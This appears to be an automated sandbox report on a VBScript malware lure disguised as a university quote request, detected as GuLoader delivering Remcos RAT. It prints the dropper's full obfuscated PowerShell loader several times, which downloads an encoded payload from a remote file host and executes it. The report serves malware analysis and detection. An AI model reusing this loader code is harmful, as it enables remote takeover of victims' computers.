Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs

Overview

General Information

Sample name:PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:PEDIDO DE ORAMENTO (Universidade NOVA de Lisboa) 03-10-2025pdf.vbs
Analysis ID:1634208
MD5:bcca3cd94046dd8e25f4b6f6a5e6670b
SHA1:837b1297114b97cf87fcc04165a200fb18614530
SHA256:3a0c1a34343cc686a0afd97f02d8625fbc57a6d0efa0ca63108463e12d4abef7
Tags:RATRemcosRATvbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7420 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7512 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboSu emRygtMS.hiePentnZe me');Speave227 ($Snefogets);Speave227 (Udgangspositioner 'Int.$ViftFSuproTectrPsa.t BrisSkatt ubetRideeTipt..hotHIndkeDiabaRen dE rieRedirNontsFebe[Stel$Ove NRu.deF ywtKuldpR,merRingoO tlbInf l epeHalmmEmmi],igb= re$ LamEAl.inMaantReflr coleGonewBremeOverrAbornAyateFisks');$Gelation=Udgangspositioner 'Rige$SchnFCoasoMortrTauttinsasEscatAss,tUna.eKile. SukD melo mmbwDitinBulblbarkoE ila.ravdFirhF U si Re l Poleudry(Genn$ SpetToarvLifeaUnfanFanggSplesTaalaCommuko tk Abot S diSilaocapsnCajoe A frFrugsTegn,Disc$Ledea esprSummuIn.rn Th dAuraoCa,c)';$arundo=$Indianers;Speave227 (Udgangspositioner 'Dite$deklGwinnl,ispoUnglbFlusADep lAfls:VibrFaimajNonpO SerRUndsd synmRoboUTa cnIdeoD M siSlusn Folg Ov EBe eNJoin=Dada(Re rTUdskeVoluSBeteT Pi.-SockP Epia lfTUdl.hSeld Ove$ edlALi lrEgenUUnafnSmutdKetaO Blo)');while (!$fjordmundingen) {Speave227 (Udgangspositioner ' etr$Coa gTreblmedsoVulkbSamvaFor lalle:Spr,m elfe Un r None Dirsapt,tCarboBestnBoloeSupe=Foet$RepekroeoaOrd nN,hoaSlutlFremjPalieDivir ardnButieRaads') ;Speave227 $Gelation;Speave227 (Udgangspositioner ' Hur[BactTSu.cHFdserSk iEBestaFresdIndtI EteNSvmmG Sup.M tct tofhAgasr neECleaAbortDInca]Co o:D fe:SecrSIodiL FreeBlegE S oPCast(Moto4 Gy 0smak0 Sl,0Ski )');Speave227 (Udgangspositioner 'Subm$,nregBl.dLOveroFaciBPse ARa,blDom :Fa.lF meoJsyltObon rAfbedMccaMSk,muIndfNTempdFar i N tNStangMultekursNSv r=Mell(.yroTUnwaEBidssdecrtTeta-Hoz.pNormA Flatbi,uhNonp Sko$AfslaHollrfestuOmstNh rnD Unio Af,)') ;Speave227 (Udgangspositioner ' Hae$ScengHov lSka o FriB,ypeASpilLKnok:abapuAa edBe,eOCamo=Rea $Han.G G,dLD naoEl.kbS dpADre,lNonf:Admob wki impS FemL wtuALusiGEmansBurs+Unbo+Qui %Pynt$HygitHereRSeleYStrapflo,ADia rammoSRefraFordmpostIFeridIncaeGena. percRefloCourU kkvnU leT') ;$tvangsauktioners=$Tryparsamide[$Udo]}$Biflagelate=301975;$Kompatibel=31044;Speave227 (Udgangspositioner 'Selv$HerrGTicilVipsO temb .odA.panlTugs: edapBe eABeniN ispT aptS KanA r,ntatteTGwedeDdelscant H tt= Pro patrGPertEH.nkTNonm-ap,iCR ntOReennSvovTsexaEPil n ouztLan. T sk$CosmASteeRTrinuDataN StoDskrmO');Speave227 (Udgangspositioner 'cres$ ilg Varl T.cobusib ForaTranlMarg:DresN FriyDiabmO leaHeria Patn Unae Ov Guse=Hesi en[JourSfr.nyBlresKa gtKjeneRekomI te.MudrCHel o ensnAkonvEquae Pror ubit Cre],eni: .li:KontFdd.sr F ioRettm inkBEn,oa ancs Rrie Byg6 V,l4 Ga S nmetAbrarUdfuiHa rnChapgRack( Fot$BasiP llaVandn N ntScias.axiadi ktSl,ttJageeRings Fi )');Speave227 (Udgangspositioner 'Fing$AudaGRelaLsmagoMa gbLiquaproklPl t:StraHUnu val,kiLftesLabalfiskeBremlAm,ay Ud,DSk r K n=Delf kund[ DirSPsy yAlkos Gent V dE UfeM Lun.OpfrTGa te HvlX ordT,gem.Spr E,ifiNFilmcinpoO retD desiPhysn CongC ou] Ste:Nonb:Hus aAiesSCystCDropiSpaciBe.e.DiazGPhosE Skatrests QuitA opRMi.giNulpnPseuGCrys( Mu $Omb.nFilpY etrmReveAFluxA Fr NEartE arr)');Speave227 (Udgangspositioner ' ris$ BesGUps,Ldi,aOUn,ebLandaUn lL Equ:stanm omioHorncUnadkWien= Fin$OphnH Pi VConcIR ptsInddlHov.EstamlplatyS,badWood.Kni SBliaUindebFormsCrosTNak r BoliTryknElekgUdgi(subc$SleuBZoogIU bofGrntLNorma AutgFl eeBe aLMe,aaun oT,vrgESy k,S,ug$undiK AtooEmanm lanPLeapaBantT TulIAke.B,sprEHo elPath)');Speave227 $Mock;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7820 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 3064 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboSu emRygtMS.hiePentnZe me');Speave227 ($Snefogets);Speave227 (Udgangspositioner 'Int.$ViftFSuproTectrPsa.t BrisSkatt ubetRideeTipt..hotHIndkeDiabaRen dE rieRedirNontsFebe[Stel$Ove NRu.deF ywtKuldpR,merRingoO tlbInf l epeHalmmEmmi],igb= re$ LamEAl.inMaantReflr coleGonewBremeOverrAbornAyateFisks');$Gelation=Udgangspositioner 'Rige$SchnFCoasoMortrTauttinsasEscatAss,tUna.eKile. SukD melo mmbwDitinBulblbarkoE ila.ravdFirhF U si Re l Poleudry(Genn$ SpetToarvLifeaUnfanFanggSplesTaalaCommuko tk Abot S diSilaocapsnCajoe A frFrugsTegn,Disc$Ledea esprSummuIn.rn Th dAuraoCa,c)';$arundo=$Indianers;Speave227 (Udgangspositioner 'Dite$deklGwinnl,ispoUnglbFlusADep lAfls:VibrFaimajNonpO SerRUndsd synmRoboUTa cnIdeoD M siSlusn Folg Ov EBe eNJoin=Dada(Re rTUdskeVoluSBeteT Pi.-SockP Epia lfTUdl.hSeld Ove$ edlALi lrEgenUUnafnSmutdKetaO Blo)');while (!$fjordmundingen) {Speave227 (Udgangspositioner ' etr$Coa gTreblmedsoVulkbSamvaFor lalle:Spr,m elfe Un r None Dirsapt,tCarboBestnBoloeSupe=Foet$RepekroeoaOrd nN,hoaSlutlFremjPalieDivir ardnButieRaads') ;Speave227 $Gelation;Speave227 (Udgangspositioner ' Hur[BactTSu.cHFdserSk iEBestaFresdIndtI EteNSvmmG Sup.M tct tofhAgasr neECleaAbortDInca]Co o:D fe:SecrSIodiL FreeBlegE S oPCast(Moto4 Gy 0smak0 Sl,0Ski )');Speave227 (Udgangspositioner 'Subm$,nregBl.dLOveroFaciBPse ARa,blDom :Fa.lF meoJsyltObon rAfbedMccaMSk,muIndfNTempdFar i N tNStangMultekursNSv r=Mell(.yroTUnwaEBidssdecrtTeta-Hoz.pNormA Flatbi,uhNonp Sko$AfslaHollrfestuOmstNh rnD Unio Af,)') ;Speave227 (Udgangspositioner ' Hae$ScengHov lSka o FriB,ypeASpilLKnok:abapuAa edBe,eOCamo=Rea $Han.G G,dLD naoEl.kbS dpADre,lNonf:Admob wki impS FemL wtuALusiGEmansBurs+Unbo+Qui %Pynt$HygitHereRSeleYStrapflo,ADia rammoSRefraFordmpostIFeridIncaeGena. percRefloCourU kkvnU leT') ;$tvangsauktioners=$Tryparsamide[$Udo]}$Biflagelate=301975;$Kompatibel=31044;Speave227 (Udgangspositioner 'Selv$HerrGTicilVipsO temb .odA.panlTugs: edapBe eABeniN ispT aptS KanA r,ntatteTGwedeDdelscant H tt= Pro patrGPertEH.nkTNonm-ap,iCR ntOReennSvovTsexaEPil n ouztLan. T sk$CosmASteeRTrinuDataN StoDskrmO');Speave227 (Udgangspositioner 'cres$ ilg Varl T.cobusib ForaTranlMarg:DresN FriyDiabmO leaHeria Patn Unae Ov Guse=Hesi en[JourSfr.nyBlresKa gtKjeneRekomI te.MudrCHel o ensnAkonvEquae Pror ubit Cre],eni: .li:KontFdd.sr F ioRettm inkBEn,oa ancs Rrie Byg6 V,l4 Ga S nmetAbrarUdfuiHa rnChapgRack( Fot$BasiP llaVandn N ntScias.axiadi ktSl,ttJageeRings Fi )');Speave227 (Udgangspositioner 'Fing$AudaGRelaLsmagoMa gbLiquaproklPl t:StraHUnu val,kiLftesLabalfiskeBremlAm,ay Ud,DSk r K n=Delf kund[ DirSPsy yAlkos Gent V dE UfeM Lun.OpfrTGa te HvlX ordT,gem.Spr E,ifiNFilmcinpoO retD desiPhysn CongC ou] Ste:Nonb:Hus aAiesSCystCDropiSpaciBe.e.DiazGPhosE Skatrests QuitA opRMi.giNulpnPseuGCrys( Mu $Omb.nFilpY etrmReveAFluxA Fr NEartE arr)');Speave227 (Udgangspositioner ' ris$ BesGUps,Ldi,aOUn,ebLandaUn lL Equ:stanm omioHorncUnadkWien= Fin$OphnH Pi VConcIR ptsInddlHov.EstamlplatyS,badWood.Kni SBliaUindebFormsCrosTNak r BoliTryknElekgUdgi(subc$SleuBZoogIU bofGrntLNorma AutgFl eeBe aLMe,aaun oT,vrgESy k,S,ug$undiK AtooEmanm lanPLeapaBantT TulIAke.B,sprEHo elPath)');Speave227 $Mock;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5212 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2872 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.1713506946.0000000008610000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000010.00000002.1904170873.00000000087D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.1700646122.0000000005A0B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000E.00000002.1713697636.000000000B79F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.1354216090.0000021A98A73000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_7608.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7608.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfca6:$b2: ::FromBase64String(
              • 0xd030:$s1: -join
              • 0x67dc:$s4: +=
              • 0x689e:$s4: +=
              • 0xaac5:$s4: +=
              • 0xcbe2:$s4: +=
              • 0xcecc:$s4: +=
              • 0xd012:$s4: +=
              • 0xf3b4:$s4: +=
              • 0xf434:$s4: +=
              • 0xf4fa:$s4: +=
              • 0xf57a:$s4: +=
              • 0xf750:$s4: +=
              • 0xf7d4:$s4: +=
              • 0xd84a:$e4: Get-WmiObject
              • 0xda39:$e4: Get-Process
              • 0xda91:$e4: Start-Process
              amsi32_3064.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa835:$b2: ::FromBase64String(
              • 0x98c8:$s1: -join
              • 0x3074:$s4: +=
              • 0x3136:$s4: +=
              • 0x735d:$s4: +=
              • 0x947a:$s4: +=
              • 0x9764:$s4: +=
              • 0x98aa:$s4: +=
              • 0x13b2d:$s4: +=
              • 0x13bad:$s4: +=
              • 0x13c73:$s4: +=
              • 0x13cf3:$s4: +=
              • 0x13ec9:$s4: +=
              • 0x13f4d:$s4: +=
              • 0xa0e2:$e4: Get-WmiObject
              • 0xa2d1:$e4: Get-Process
              • 0xa329:$e4: Start-Process
              • 0x1479f:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4076, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs", ProcessId: 7420, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5212, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49720
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4076, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PEDIDO DE OR#U00c7AMENTO (Universidade NOVA de Lisboa) 03-10-2025#U00b7pdf.vbs", ProcessId: 7420, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Overkindly;function Speave227($Posttypernes){ .($Tunneldalenes) ($Posttypernes)} function Udgangspositioner($Luftpudebaadenes92){$Nonvernacular=4;do{$Zoogeological+=$Luftpudebaadenes92[$Nonvernacular];$Nonvernacular+=5;$Underbodies119=Format-List} until(!$Luftpudebaadenes92[$Nonvernacular])$Zoogeological}$Brnelrdommene=Udgangspositioner 'Ru,lnMilie routTils. So.W';$Brnelrdommene+=Udgangspositioner ' UngEGallbKoercT,lel Ot,iIn.le SkeN eflt';$Entrewernes=Udgangspositioner 'TromMProtoAttezPo tiPe.dlUnqul S ra Dis/';$Seaboards=Udgangspositioner 'B slT AvilBlodsAuto1alle2';$Fodnoter=' .ag[Del NKnogEAmidTMa e.NedrSdemoe,izzrT ngv ndyi,ijocMngdeBortPSparO abliOvernAf,otGambMChokAShenNSk faOb oGBr dEActiRForv] M t:Knys:EnvesFinmEBoggcD eluRetyrSta IE.eit yrYStniPLoverMercoRickT OproSci CFarmOSkraLMaxi=Unde$AsidS omED kuAM dsB eigO Af,AMe lrTonedReeds';$Entrewernes+=Udgangspositioner 'Trin5Sa g.Lite0 Sam Af a(CamoWPol i ktinStrudinddo Su.wTelesCanc orthN PrsT nou Is.1 st 0 Nar.caut0Dfa.;Unsa mandWFloriDedunSort6Uni 4,niv;Goll .iox Akt6Fu,s4Solo;Twit slir adivTale:Cali1Anti3 lux4In o.Prov0A.ts) Far ScieGKommebortc U ikCrysoU.de/Stru2Sawb0Mis.1Sulc0 Adj0quiz1Do n0Worm1 Spi ,locFSnusiLabirLykkeKrypfbastoMillxJayw/ ypo1S ap3 Eks4Fluo.Citr0';$Netproblem=Udgangspositioner 'trasuHap SAllee CitRSkir-W,enAAnglg,azaE KienZilcT';$tvangsauktioners=Udgangspositioner 'Cor h DattCytotBidsparbes end: ejo/A ti/ BeadA.virManlicosmv oreEp e.SnurgRev oIsobo emegKno l s,geDial.P ntcLeiboHonemK od/Bedru,nuscTviv? imeJud.xPlotpZon,oGre rUpaatProd= .omdKi.eopimpw Obsnb nslH.peoXiphaParhd,alu&TaphiCitrdKaro=betj1com,LIndeWStegp O aU Non1HaanPPe,aK InsLA sb-unrePEp,p-Bun E S hM ien6For L ArttR getDannkmargmFo hC aks2Trit2 VadK ApoNR covcougMSiet9UnreQtrice SenSstri8Sup Z';$Nonvernaculardeologikritik=Udgangspositioner ' Coe>';$Tunneldalenes=Udgangspositioner ' GruiDra,eOutsX';$Miaow='Besvarer237';$Minium='\prostituaqr.Und';Speave227 (Udgangspositioner 'Pr r$ PregYardlSeino CutbDi taBrowlAcri:SootiAmebn TitDG.ifiT.bua MayN .smeArguRTyveSSmer=Tris$.ndgEValfNSkagvSter: heAGratp atupToxiD AmmAAur.TCoenaFlot+ gou$Romam ho i L,knUnp,i priuBiocm');Speave227 (Udgangspositioner 'Unsy$Styrg Re LStepoLoweb,ueea veLRefu:HaratA,azr ,olyTimoP arvaLa,erValgsDampaSyncmRudeiCe sdBaptENons=Husb$Gruntsha vEmdaa FranEurygMaissoleaABi tuEr.vKFibeT ,asI rthOGittnBa seDdmarUn uSklim.BirisTrykPDis,lStnkiInteTNumm( Gil$DracnM alOPur nSubcVBe dE Disr nagNunreadefic ApoUSal,lInstaErgor ptedSabbE he oHec,l andOLophG redISparkBe,sR In i SemTIndtICh lKTwen)');Speave227 (Udgangspositioner $Fodnoter);$tvangsauktioners=$Tryparsamide[0];$Snefogets=(Udgangspositioner ' Udv$SemiGIchtl R fOFremB RrlaWantlAldi: d,fFW odOM,ckrBrysTDysgSDo oT.iglt Pa.E ras=R banFamiE .odW Ta,-dandoCheaBVisnj None R cCAksitanti Pa.as,okuYTeknSIntetChamE Rysm ove. Jyd$Tyl B OveRF eln AnkeUntrLAdopRMockd ZeboSu emRygtMS.hiePentnZe me');Speave227 ($Snefogets);S
